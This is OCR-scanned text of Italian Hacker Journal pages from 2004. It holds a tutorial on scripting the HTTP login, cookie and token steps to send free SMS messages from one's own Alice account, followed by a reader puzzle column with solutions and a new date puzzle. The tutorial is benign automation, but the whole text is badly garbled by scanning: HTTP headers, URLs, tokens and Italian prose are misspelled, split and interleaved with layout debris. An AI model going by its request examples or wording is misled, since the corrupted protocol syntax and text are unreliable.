rente di Song la marca forse 
cambierà? :-) 


< L'hard 
disk è pic¬ 
calo ma 
arriua 
anche a 40 
giga e si 
dice che 
tra poco usciranno i modelli 
da 60 o più. 


[ p 27 LI www.hadterioumaLit l 





















F \ (SSÌPosta f gJTelefono r|jS 

SMS«. Il ■ 



L.orrimuriftv e uno dei 

l'abbonamento Alice 
offre ai scoi utenti 
IO sms gratuiti 


non creare 
un programma 
cbe effettui 


tutte le operazioni 
al posto nostro? 


a i serve solo una buona 
conoscenza dell'HTTP e un 
account ©aliceposta.it. 
Costruiremo un programma 
che effettua il login e manda 
l'sms al nostro posto, senza piu 
fare noiosi login e sorbirci quantità indu¬ 
striali di banner! 







potrebbe napuimeioi 


i. rossoalice.il 


Hccept: */' 


Content-tupe: application/H- 


Immaginiamo di avere un account pip- 
po@aliceposta.it e avere per password 


trovare tanti nuovi §| 

Per prima cosa effettuiamo una connes- 


HTTP/1.0 200 OK 
Date: Fri, 02 Jul 2004 06:39:40 GMT 
Serper: UJebLogic LUebLogic Tem- 
porary Patch for CR107598 
! 06/05/2003 15:16:50 
Content-Length: 3867 

e 

JNJ3qr 
IpNOCfl 

niit-i 




Per prima cosa effettuiamo una connes- ., . 

sione socket al sito www.rossoalice.it alla - Il server ci invierà la pagina html, e La parte che ci interessa é: 
porta 80 ed utilizziamo il metodo POST negli header un set-cookie che indiche- 
per inviare i nostri dati: rà al server che abbiamo già fatto il login 

e che quindi dobbiamo memorizzare. 


POST /alice/portal/seruice/login 
/entry.do HTTP/1.1 


eco un esempio di quello che 




JSESSI0NIQ=HIDr7ufGPVqHU9NJ3qr ! 
nH2Up59fs900fggsfLh504nt}pNDC0 ! 
Vmd7!2125593429!UJls09!9011!-1 
la terremo presente. 















Ottenuto I! cookie, ricolleghiamoci a 
www.rossoalice.it usando sempre il meto¬ 
do POST e inviando questa volta anche 
il Cookie: 


I POST /alice/portal/seruice/login 
/entry.do HTTP/1.1 
User-fìgent: Mozilla/4.□ (compa¬ 
tirne; MSIE 6.0; Windows NT 5.1) 
Opera 7.23 [iti 
I Host: ujujw.rossoalice.it 
Cookie: JSESSI0NI0=RI0r7ufGPVq 
HU9NJ3qrnR2Up59fs9D0fggsfLh504 
nUpN0C0Ymd7!2125593429!wlsQ9! 
90111-1 

Rccept:*/* 

Hccept-Language: it, en 
Connection: Close 
Content-type: application/n- 
www-form-urlencoded 
Content-length: 55 

seruice=smsGreload=D'teldest=&l 
in=pippoB , password= 



/NHSflpp/scu 18?/wond_inuiaSms.d 
o?loken=3f-7FM5WB91He7c2djg57 
46H9a37T0kuB 


che è la path che dobbiamo richiedere. 
Ora ci colleghiamo al sito scu.187- 
bbb.it usando un GET 


GET /NflSHpp/scu 187/wond 
-inuiaSms.do?token = 3f- 
7FM5W8U1He7c2djg5?46fl9a37T0k 
uB HTTP/1.1 

Oser-flgent: Mozilla/4.0 (campa- 
tibie; MSI E 6.0; Windows NT 5.1) 
Opera 7.23 [iti 
Mosi: scu.187-bbb.it 
C o o k i 
JSESSI0NID=filQr7ufGPYqHU9N.^ H . 
nH2Up59fs900fggsfLh504nOpNDCO 
Vmd 712125593429 !wls09!9mi!-1 
Rccept: */* 

Rrcept-Language: it, en 
Connection: 



GEI /alice/portal/seruice/body, 
/entry.do?seruice=sms HTTP/1.1 
User-Rgent: Mozilla/4.0 (compa- 
tible; MSIE 6.0; Windows NT 5.1) 

Opera 7.23 [itj 

Hust: www.rossoalice.it 

Cookie: JSESSI0NI0=RIDr7ufGPYqH 

U9NJ3qrnR2Up59fs900fggsfLh504nQpS 

DC0Vmd7!2125593429!wls09!9011!-1 

Rccept: */* 

Rccept-Language: it. en 
Connection: Close 


l.~l- 


width= 
<formname= 


align=“li 
sForm method= 


sion 10-4 54 21576 7261800057 
j&amp; 


dove &amp; è un tag html per indicare il 
simbolo &. Per estrapolarla potremmo 
usare una regex. 

Una volta ottenuta possiamo finalmen¬ 
te connetterci a scu.187-bbb.it e utilizza¬ 
re il POST per spedire l'sms. Mettiamo 
che il nostro sms sia "io amo l'http!" e il 
destinatario sia 328 1234567, invieremo 
questi header e richiederemo la: 


ath /NRSflpp/scu 107/wond 
nuiaSms.do? 


più la parte appena ricavata dal buffer. 


1ST /NRSRpp/scu 187/w 
inuiaSms.do?GHHC_gH_sessi 
=GHLiteSessionl_ 
45421576726180005760- HTTP/1.1 
| User-Rgent: Mozilla/4.0 (compa- 

.1SIE 6.0; Windows NT 5.1) 

.23 liti 
Host: scu.1B7-bbb.it 
Rccept: */* 

2 pt-Language: It. en 


Log in 

Rubrica | 

Username: | username Password: (.... 

Commenti 

Destinatario: (320 3 | | 

Updates | 






"Rubrica 


Nomo; 


Numero 



pigri possono osare il programma elio trovano all’indirizzo 

bttp://sns.d-2-k.tk/ 


f lt's now at < a 
ref = " http://scu.187- 
tjb.il/NRSRpp/scu 187/wond_inuic 
oms.do?token = 3f-i 
" 7FM5WR91He7c2djg5746R9a37T0k 

u B '' > h t I p : / / s c u . I B 7 - 
bbb.it/NRSflpp/scu 187/wond_inuia 
Sms.do?token = 3f-, 
7FM5WB91He7c2djg5746R9a37T0k 
uB</a >' 


•It s now at <a href=.” 
http://scu.!87-bbb.it(.*)</a>.</ 


Applicando la regex otterremo 


r " action="/r\nSRpp/scu187/ 
wond_readRddressBook.do"><INP 
UT NRME="GHHC_gH_session_id_" 
TYPE='HIOOEN"URLUE='GHLiteSes- 
sionlO-4542157672618000576" 
></1NP0T> < a 

href= "jauascriptisubmitFormfld- 
dress(0* 1);//?GHHC_gn_sessi 
J_=GHLiteSess ionio 
j 454215767261800n5?6Gamp; o..._ 
cijs= if(this.blur)this.blur();"ximg 
src="/wond/img/seleziona_darubri- 
ca.gif" alt="" widlh= 132” herght=’ 16" 
hspace="8" border= 0></a> 


La parte che ci interessa è: 


GHHC_gH_session_id_=GHLiteSes- 


Connection: Close 
Content-type: application/n 
www-form-urlencoded 
Conlent-length: 125 

prefisso=328&num- 
Jst=1234567D-destFaH=G , nome 
)est=&cognomeDest=B-inuio=Of>da 
la=G'ora=0 , minuti=G’testo=io+amo 
+ r*bttpG-insNumMittente =0 


Abbiamo inviato il nostro sms! 

Un esempio pratico lo troviamo all’indi¬ 
rizzo http://sms.d-2-k.tk/ 

Dark_Sun 

nOcturnalH@gmail.com 


P29 













































EMBERENIBMB 



RITARDI E VARIAZIONI 
SUL TEMA 

n lex stava rileggendo le risposte rela¬ 
tive al problema one-time pad, pub¬ 
blicate nel numero 55 (cyberenigma del 
numero 52), e chiede aiuto su come pro¬ 
grammare in Java la decodifica. Se qualche 
super hacker se la sente ci avvisi e stabilia¬ 
mo il contatto! Gabriel Popescu invece sta 
ancora litigando con i pangrammi. Attendia¬ 
mo presto la soluzione! 



AIUTIAMOCI 
SUL CYBERENIGMA 

P iccole indicazioni che ci aiutano a non 
perdere per strada nessuno! 

- inviare mail con subject Cyberenigma e il 
numero della rivista, e magari il titolo del 
cyberenigma; 

- il nickname in fondo al messaggio è quel¬ 
lo che consideriamo; chi autorizza la pubbli¬ 
cazione del suo indirizzo ce lo dica, altrimen¬ 
ti l'indirizzo resta riservato; 

- è meglio, anche se non necessario, che la 
soluzione arriva prima che esca il nuovo 
numero di HJ; 

- scrivere all'indirizzo di mail presente nella 
pagina del cyberenigma. 

Chi segue le indicazioni non avrà problemi 
di pubblicazione! 


CMBEHEMPMHi 

e MUMEHI 

I nanne podi in naop sicuro 

I c aFFinnaiLC non c una casa schpucc. 

I Ma i supea HacHca sana in accuara... I 


Le soluzioni 


C omplimenti a tutti per l'ingegno¬ 
sità dimostrata in questo cybe¬ 
renigma! Le domande non erano rigoro¬ 
se, poiché le risposte possibili sono infi¬ 
nite. Ricordiamole: 

PER TUTTI: Trovare su Internet un modo 
per lanciare dadi. 

PER ESPERTI: Trovare un modo fuori 
dal web per lanciare dadi, magari senza 
usare computer, magari con controllo e 
verifica dei lanci. 

PER GENI: Programmare un meccani¬ 
smo di lancio di dadi che sia veramente 
casuale. 

PER SUPER HACKER: Pensare e/o 
programmare un meccanismo che con¬ 
senta a due o più persone di giocare a 
carte, magari senza passare da un ser¬ 
ver centrale. 


► ia disposizione dei nomeri 
sulle fece dei dadi da pica 
non è casuale ma obbligata. 
Chi la ricorda a memoria ? 


Hbbiamo mai 
pensata ab 
inuentarci dadi? 
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I Solutori 


Primo arrivato: Bonny, per tutti 


Funky 

Check_Mate 

(ma ci siamo divertiti!) 

Dgames 

ewall 

(occhio agli errori) 
Enrico Sunseri 
(menzione d'onore) 

The Crocodile 
DiOne 

Angelo “Trilussa" Basile 

Marco Orlandi 

Devilangel666 

Vlad87 

Z3u5 

-DENNYX- 
Alessio Failla 
furious876 
ThNIsaHead 
Sandro kensan 
(bravo!) 

Advisor 

Ascar 

(molto bravo!) 

Daniele Midi 
X-3mE'89 
(ma facci 
vedere qualcosa!) 


Per tutti 
Per tutti 

Esperto 

Esperto 

Esperto 

Esperto 

Esperto 

Esperto 

Genio 

Genio 

Genio 

Genio 

Genio 

Genio 

Genio 

Genio 

Genio 

Super hacker 
Super hacker 

Super hacker 
Super hacker 


Pronti per il prossimo cyberenigma? 
Basta voltare pagina... buon hacking! 


Barg thè Gnoll 
gnall@hackerjournal.it 


THNISAHEAD ALL’OPERA 

^Vuesto è un programma VisualBa- 

qpsic che tira casualmente un dado 

da 6, utilizzando i centesimi di secondo del¬ 
l'orario di sistema. Il tutto dipende da quan¬ 
do si avvia il programma, ma è così fine che 
perfino la posizione della testina del disco 
rigido influenza il risultato e, dunque, è pra¬ 
ticamente impossibile forzare il risultato o 
prevederlo. Allego anche la routine di con¬ 
trollo, che ho utilizzato per testarlo (routine 
Test), che esegue 30000 lanci e scrive i la 
frequenza di ciascun numero. Con innume¬ 
revoli test, si può notare che il dado è perfet¬ 
tamente bilanciato. Per confermarlo ho ese¬ 
guito 20 test (600.000 lanci!)”. 


IL DUBBIO DI FUNKY 

% 

E un po' una ca22ata ma... qual è il 
metodo migliore di generare numeri se 
non la nostra mente? :P 

La risposta è: sicuro che la tua mente sap¬ 
pia generare numeri perfettamente casuali? 
E come lo verificheresti? A dire il vero il tema 
della verifica della casualità è stato schivato, 
o minimizzato, da quasi tutti. Quasi fa un 
intero cyberenigma da solo! 





>NEXT CUBEHENICMD 
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Ferragosto e Ten Years Attor 


Questo numero di Hacker Journal è in edicola da giovedì 12 agosto 2004.1 il numero di Ferragosto! Nel senso che è 
quello più vicino al 15 agosto. Sarebbe bello ritrovarci tutti tra dieci anni a festeggiarlo (Perché? Perché no! Mai 
sprecare un’occasione di fare festa!!. Non sappiamo se lo si è notato, ma Hacker Journal esce (e uscirà! sempre di 
giovedì (ma non tutti i giovedì e saltando un numero ad agosto!. 


© Per tutti: Che giorno della settimana sarà il 15 agosto 2D14? Già che ci siamo, possiamo 
sapere anche la data della Pasqua (così ci organizziamo l’agenda!? 

QO Per esperti: In che data sarà in edicola il numero di Ferragosto di Hacker Journal 
del 2014? Quasi come chiedere: quanti numeri di Hacker Journal usciranno, contando dal 
prossimo fino al numero di Ferragosto 2014 compresi? 

©O© Per geni: Se Hacker Journal fosse nato il primo giouedì del 1752, quanti numeri aurebbe 
pubblicato in quell’anno? E quanti ne aurebbe pubblicati fino a questo numero compreso? 

Chi sa scriuere un programma che calcola le date di uscita di 
Hacker Journal per qualsiasi anno passato, presente e futuro? 


Le regole: 

Nessuna regola, ma attenzione alla premessa prima delle domande. Ci sono tutte le informazioni 
che servono per non sbagliare! 


P.S.: Qualcuno ha mai ascoltato i Ten Years After? http://www.ten-years-after.com/ 


le risposte a: 


guestbook ©hackerjaurnal. ft 






